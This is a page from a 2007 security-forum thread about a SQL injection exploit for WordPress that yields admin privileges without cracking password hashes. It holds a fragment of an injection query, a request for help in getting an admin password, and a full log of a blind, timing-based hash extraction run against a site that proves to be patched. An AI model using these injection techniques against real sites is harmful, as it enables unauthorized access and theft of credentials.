|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 104
Members: 0
Total: 104
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
|
|
Posted: Tue May 22, 2007 12:11 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
spec wrote: | you're right waraxe, thanks |
I'm happy to help you
Heh, what I read from wordpress delevopers:
Quote: |
The actual cookies contain hashed data, so you don't have to worry about someone gleaning your username and password by reading the cookie data. A hash is the result of a specific mathematical formula applied to some input data (in this case your user name and password, respectively). It's quite hard to reverse a hash (bordering on practical infeasibility with today's computers). This means it is very difficult to take a hash and "unhash" it to find the original input data.
|
Funny thing - so much cryptography applied to make passwords "immune" to crack and still - even WITHOUT actual cracking we can get admin privileges |
|
|
|
|
|
|
|
|
Posted: Tue May 22, 2007 12:21 pm |
|
|
spec |
Beginner |
|
|
Joined: May 22, 2007 |
Posts: 4 |
|
|
|
|
|
|
|
who needs to unhash a hashed pass in this case? no one, you get to have an admin privileges and thats all it matters, , so much for security |
|
|
|
|
|
Re: What about username they are not all "admin" : |
|
Posted: Tue May 22, 2007 3:31 pm |
|
|
_-GORO-_ |
Beginner |
|
|
Joined: May 22, 2007 |
Posts: 3 |
|
|
|
|
|
|
|
That would be nice, buy I find out that every post on blog has an admin's (user name) as signature of the poster - it is open.
BTW - did you try it on any other versions?
waraxe wrote: | I got it
This needs some modifications to exploit. If you are interested, then I can make improved exploit with this additional functionality
_-GORO-_ wrote: | waraxe wrote: | _-GORO-_ wrote: | Nice work!
What about username they are not all "admin" ?
UNION ALL SELECT 1,2,user_name.... ????? |
One way is to find out ID, which belongs to needed target user.
Another way is to modify attack query.
Orig:
New:
Code: | WHERE display_name=%2527waraxe25%27 AND IF |
|
Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. |
|
|
|
|
|
|
Posted: Wed May 23, 2007 12:27 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
Posted: Sun May 27, 2007 3:02 pm |
|
|
pexli |
Valuable expert |
|
|
Joined: May 24, 2007 |
Posts: 665 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
|
i need help |
|
Posted: Fri Jul 13, 2007 12:49 am |
|
|
amir00 |
Beginner |
|
|
Joined: Jul 13, 2007 |
Posts: 2 |
|
|
|
|
|
|
|
I need help to finde admin passwd.
Code: | sql table prefix: wp_ cookie suffix: c6e75ae1b68abe4cb4cb59d205593067 testing probe delays 8 9 9 9 8 8 mean nondelayed - 8 dsecs mean delayed - 8 dsecs normal delay: 8 deciseconds trying to get md5 hash from target finding hash now ... char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 1 --> 0 current value for user_pass: 0 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 2 --> 0 current value for user_pass: 00 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 3 --> 1 current value for user_pass: 001 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 4 --> 0 current value for user_pass: 0010 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 5 --> 0 current value for user_pass: 00100 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 6 --> 0 current value for user_pass: 001000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 7 --> 0 current value for user_pass: 0010000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 8 --> 0 current value for user_pass: 00100000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 9 --> 0 current value for user_pass: 001000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 10 --> 0 current value for user_pass: 0010000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 11 --> 0 current value for user_pass: 00100000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 12 --> 0 current value for user_pass: 001000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 13 --> 0 current value for user_pass: 0010000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 14 --> 0 current value for user_pass: 00100000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 15 --> 0 current value for user_pass: 001000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 16 --> 0 current value for user_pass: 0010000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 17 --> 0 current value for user_pass: 00100000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 18 --> 0 current value for user_pass: 001000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 19 --> 0 current value for user_pass: 0010000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 20 --> 0 current value for user_pass: 00100000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 21 --> 0 current value for user_pass: 001000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 22 --> 0 current value for user_pass: 0010000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 23 --> 0 current value for user_pass: 00100000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 24 --> 0 current value for user_pass: 001000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 25 --> 0 current value for user_pass: 0010000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 26 --> 0 current value for user_pass: 00100000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 27 --> 0 current value for user_pass: 001000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 28 --> 0 current value for user_pass: 0010000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 29 --> 0 current value for user_pass: 00100000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 30 --> 0 current value for user_pass: 001000000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 31 --> 0 current value for user_pass: 0010000000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 32 --> 0 current value for user_pass: 00100000000000000000000000000000 Final result: user_pass=00100000000000000000000000000000 trying to get user login from target first we need user login length ... starting user_login length retrieve curr: 30--30--0 curr: 15--15--0 curr: 7--7--0 curr: 3--3--0 curr: 1--1--0 user login length is 0 chars finding user login now ... Final result: user_login= Work finished Questions and feedback - http://www.waraxe.us/ See ya! :) |
|
|
|
|
|
|
|
|
|
Posted: Fri Jul 13, 2007 2:22 am |
|
|
Sm0ke |
Moderator |
|
|
Joined: Nov 25, 2006 |
Posts: 141 |
Location: Finland |
|
|
|
|
|
|
user_pass=00100000000000000000000000000000 |
|
|
|
|
Posted: Fri Jul 13, 2007 9:30 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
It seems to be patched WP installation, so that this exploit is not working (anymore) ... |
|
|
|
|
Posted: Fri Jul 13, 2007 4:05 pm |
|
|
amir00 |
Beginner |
|
|
Joined: Jul 13, 2007 |
Posts: 2 |
|
|
|
|
|
|
|
waraxe wrote: | It seems to be patched WP installation, so that this exploit is not working (anymore) ... |
ok . thank |
|
|
|
|
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 2
Goto page Previous1, 2
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|